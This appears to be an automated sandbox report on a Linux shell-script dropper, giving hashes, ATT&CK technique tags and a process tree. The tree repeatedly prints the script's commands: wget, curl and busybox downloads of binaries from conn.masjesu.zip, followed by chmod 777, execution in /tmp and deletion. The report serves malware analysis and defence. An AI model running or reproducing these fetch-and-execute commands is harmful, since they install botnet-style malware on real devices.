839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35

Analysis

max time kernel
96s
max time network
98s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
21/11/2024, 06:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
Size

10KB
MD5

2928f83ecf5ea360d714ea8e5f96e2f1
SHA1

9ab766d81607421235434062676110c95e811b9a
SHA256

839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35
SHA512

d2264b6eb7a636120ed44c9c9c588fe733bceb6da5ccd46ceb4bd1aaadbe1195fcd917007a1cf3fbc1e686b9db293bc6263ac28e66375aece5f3606273a25fbf
SSDEEP

96:Yz39z39z3g3L3v3Yu9u9u3mhLTJThTEokbhj/n6yc0SqzBFNCFtmFNre+kpB7L29:YMEIxe+4QLKD5Sm9EIxe+o85+

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
813	chmod
944	chmod
937	chmod
888	chmod
958	chmod
965	chmod
930	chmod
951	chmod
993	chmod
1000	chmod
867	chmod
881	chmod
909	chmod
1007	chmod
747	chmod
772	chmod
874	chmod
806	chmod
923	chmod
972	chmod
986	chmod
860	chmod
895	chmod
902	chmod
979	chmod
740	chmod
831	chmod
916	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
739	busybox
863	wget
873	busybox
975	wget
978	busybox
1004	curl
716	wget
746	busybox
750	wget
851	curl
936	busybox
728	curl
802	busybox
817	curl
884	wget
927	curl
961	wget
765	busybox
786	curl
887	busybox
915	busybox
950	busybox
971	busybox
809	wget
901	busybox
906	curl
919	wget
940	wget
816	wget
864	curl
877	wget
999	busybox
777	wget
857	busybox
899	curl
933	wget
962	curl
990	curl
744	curl
751	curl
810	curl
822	busybox
929	busybox
941	curl
964	busybox
948	curl
955	curl
976	curl
1003	wget
880	busybox
892	curl
969	curl
743	wget
837	wget
878	curl
885	curl
922	busybox
947	wget
997	curl
812	busybox
912	wget
913	curl
943	busybox
954	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	curl
File opened for modification	/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	curl
File opened for modification	/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	curl
File opened for modification	/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	curl
File opened for modification	/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	curl
File opened for modification	/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	curl
File opened for modification	/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	curl
File opened for modification	/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	curl
File opened for modification	/tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI	curl
File opened for modification	/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	curl
File opened for modification	/tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt	curl
File opened for modification	/tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF	curl
File opened for modification	/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	curl
File opened for modification	/tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV	curl
File opened for modification	/tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA	curl
File opened for modification	/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	curl
File opened for modification	/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	curl
File opened for modification	/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	curl
File opened for modification	/tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l	curl
File opened for modification	/tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG	curl
File opened for modification	/tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp	curl
File opened for modification	/tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8	curl
File opened for modification	/tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB	curl
File opened for modification	/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	curl
File opened for modification	/tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J	curl
File opened for modification	/tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ	curl
File opened for modification	/tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M	curl
File opened for modification	/tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO	curl

/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
/tmp/839adacbcc779352d163b6ef7b3687fe0cf6c82cb0e73aaf52c25135cf98be35.sh
1⤵
PID:708
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:711
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - System Network Configuration Discovery
  PID:716
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:728
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - System Network Configuration Discovery
  PID:739
- /bin/chmod
  chmod 777 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  ./9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  - Executes dropped EXE
  PID:741
- /bin/rm
  rm 9tgWsRXNHSvAfmuKzfCpZllPLzDrIF1KfO
  2⤵
  PID:742
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - System Network Configuration Discovery
  PID:743
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - System Network Configuration Discovery
  PID:746
- /bin/chmod
  chmod 777 yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  ./yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm yG8bKDQmpDuHT4r35pQAH6uxIO84pP5p3J
  2⤵
  PID:749
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - System Network Configuration Discovery
  PID:765
- /bin/chmod
  chmod 777 CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  ./CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  - Executes dropped EXE
  PID:773
- /bin/rm
  rm CzfY3WCfUcUN1vj8fkEFhkFJAhcGHQbHpV
  2⤵
  PID:776
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - System Network Configuration Discovery
  PID:777
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:786
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - System Network Configuration Discovery
  PID:802
- /bin/chmod
  chmod 777 uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  ./uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  - Executes dropped EXE
  PID:807
- /bin/rm
  rm uWpZIYmE8emAxD7pzxoeyGJ5cUt6qTi2HF
  2⤵
  PID:808
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - System Network Configuration Discovery
  PID:809
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - System Network Configuration Discovery
  PID:812
- /bin/chmod
  chmod 777 IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  ./IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm IilTWcCLbCYKsTDDUI9JUspBXnzpPZ1HA8
  2⤵
  PID:815
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - System Network Configuration Discovery
  PID:816
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:817
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - System Network Configuration Discovery
  PID:822
- /bin/chmod
  chmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Executes dropped EXE
  PID:833
- /bin/rm
  rm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:836
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - System Network Configuration Discovery
  PID:837
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:851
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - System Network Configuration Discovery
  PID:857
- /bin/chmod
  chmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  ./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:862
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - System Network Configuration Discovery
  PID:863
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:866
- /bin/chmod
  chmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  ./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:869
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:870
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - System Network Configuration Discovery
  PID:873
- /bin/chmod
  chmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  ./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - System Network Configuration Discovery
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - System Network Configuration Discovery
  PID:880
- /bin/chmod
  chmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  ./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  ./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:894
- /bin/chmod
  chmod 777 e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  ./e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/chmod
  chmod 777 GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  ./GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm GjBnnN1SxGkzzfWXbGl4eVCmefINO3vSdp
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:908
- /bin/chmod
  chmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  ./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  ./rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm rTVygq67bdKN5FrIylBdjC3WphUPQ5jBgA
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - System Network Configuration Discovery
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - System Network Configuration Discovery
  PID:922
- /bin/chmod
  chmod 777 jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  ./jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm jlggVBfhQL8dXCSbIGofV2KmUGz2vLwYDQ
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - System Network Configuration Discovery
  PID:929
- /bin/chmod
  chmod 777 qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  ./qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm qTtADy7qXEy8AZSejNSjSLaQxvsEFWqS6l
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - System Network Configuration Discovery
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  ./CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm CMiRxLfPT02jcsPMxzSZWjFGq7ghemeBBB
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - System Network Configuration Discovery
  PID:943
- /bin/chmod
  chmod 777 V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  ./V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm V8B5bwMZRVz8GvcUhlJ0fizXr1eKTjB47M
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - System Network Configuration Discovery
  PID:950
- /bin/chmod
  chmod 777 yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  ./yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm yQpbu8tZijMmPZlfEcxCw00ATBMHQ9EgYt
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:957
- /bin/chmod
  chmod 777 Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  ./Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm Edto9HmaUgj0MtKTMvoQl1K0bWVcaSCWoI
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - System Network Configuration Discovery
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/e0PhMZKQq0QQrbyVGOqtUPffVLx6VwhEuG
  2⤵
  - System Network Configuration Discovery
